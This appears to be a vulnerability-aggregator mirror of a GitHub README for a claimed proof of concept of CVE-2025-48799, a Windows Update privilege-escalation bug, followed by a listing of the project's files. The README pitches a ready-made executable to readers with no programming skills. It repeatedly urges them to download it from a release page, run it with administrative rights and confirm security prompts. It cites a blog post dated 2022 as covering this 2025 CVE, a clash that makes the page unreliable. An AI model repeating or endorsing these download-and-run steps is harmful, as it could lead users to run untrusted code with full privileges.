来源

关联漏洞

描述

🛡️ Demonstrate CVE-2025-48799, a Windows Update service vulnerability that allows elevation of privilege via arbitrary folder deletion on multi-drive systems.

介绍

# 🚀 CVE-2025-48799 - Explore a Simple Proof of Concept

## 📥 Download

[![Download CVE-2025-48799](https://img.shields.io/badge/Download-CVE--2025--48799-brightgreen)](https://github.com/ukisshinaah/CVE-2025-48799/releases)

## 📝 Description

This is a Proof of Concept (PoC) for CVE-2025-48799, which is a vulnerability related to Windows Update. It can allow an attacker to gain higher privileges on affected systems. This vulnerability impacts Windows 10 and Windows 11 clients that have at least two hard drives. 

When multiple hard drives are present, users can change the location for new content to be saved using the Storage Sense feature. If a secondary drive is selected, during the installation of new applications, the Windows Update service (wuauserv) may delete folders arbitrarily without proper checks. This flaw can lead to a local privilege escalation (LPE).

For more information on the vulnerability and its exploitation, you can read the full blog post [here](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).

## 🚀 Getting Started

This section will guide you through the steps to download and run the application. You don’t need any programming skills.

### Step 1: Visit the Download Page

To download the application, click the link below:

[Download CVE-2025-48799](https://github.com/ukisshinaah/CVE-2025-48799/releases)

### Step 2: Choose the Latest Release

You will arrive at the Releases page. Here, you will see different versions of the software. Look for the latest version at the top of the list. It will generally have the highest version number. 

### Step 3: Download the File

Once you’ve found the latest version, look for the downloadable files associated with it. Click on the file name to start the download. Make sure the file is compatible with your operating system.

### Step 4: Locate the Downloaded File

After the download is complete, go to your computer’s Downloads folder. Locate the file you just downloaded. It will usually have a name like `CVE-2025-48799.exe`.

### Step 5: Run the Application

Double-click on the downloaded file to start the application. If prompted by your computer’s security settings, you may need to confirm that you want to run the file. Follow any additional on-screen instructions.

## ⚙️ System Requirements

- Windows 10 or Windows 11
- At least 2 hard drives must be installed
- Administrative access to run the application

## 🔍 How It Works

The PoC demonstrates how the vulnerability allows for arbitrary folder deletions during the update process. By changing the storage location for new applications, the service (wuauserv) fails to check properly for symbolic links, leading to potential exploitation.

## 📊 Features

- **Safe Testing Environment**: Use this PoC to understand the implications of the vulnerability in a controlled way.
- **User-Friendly Interface**: The application provides a straightforward setup process.
- **Comprehensive Documentation**: Detailed guides are available within the application and here in the README.

## 💡 Troubleshooting

In case you encounter any issues while running the application:

1. **File Not Found**: Make sure you downloaded the correct file.
2. **Permission Issues**: Ensure you are running the application with administrative rights.
3. **Incompatibility Errors**: Check that your Windows version meets the requirements.

## 📞 Support

If you need further assistance, consider visiting the [GitHub Issues page](https://github.com/ukisshinaah/CVE-2025-48799/issues). Here, you can find solutions to common problems or report any deficiencies.

Feel free to reach out to community members who may have experience with this PoC.

## 🔗 Additional Resources

- [ZDI Blog Post on CVE-2025-48799](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
- Engage with the community on forums relevant to Windows security vulnerabilities.

[Download CVE-2025-48799](https://github.com/ukisshinaah/CVE-2025-48799/releases) and start your exploration today!

文件快照

 [4.0K]  /data/pocs/411d3998e603d64451a4f81b19803b58975a17ea
├── [4.1K]  README.md
└── [4.0K]  WinUpdateEoP
    ├── [558K]  5eeabb3.rbs
    ├── [4.2K]  def.h
    ├── [4.4K]  FileOplock.cpp
    ├── [1.0K]  FileOplock.h
    ├── [ 16K]  FileOrFolderDelete.cpp
    ├── [ 10K]  main.cpp
    ├── [184K]  Msi_EoP.msi
    ├── [ 440]  resource.aps
    ├── [ 300]  resource.h
    ├── [2.1K]  resource.rc
    ├── [1.4K]  WinUpdateEoP.sln
    ├── [6.8K]  WinUpdateEoP.vcxproj
    ├── [1.6K]  WinUpdateEoP.vcxproj.filters
    └── [ 168]  WinUpdateEoP.vcxproj.user

1 directory, 15 files

备注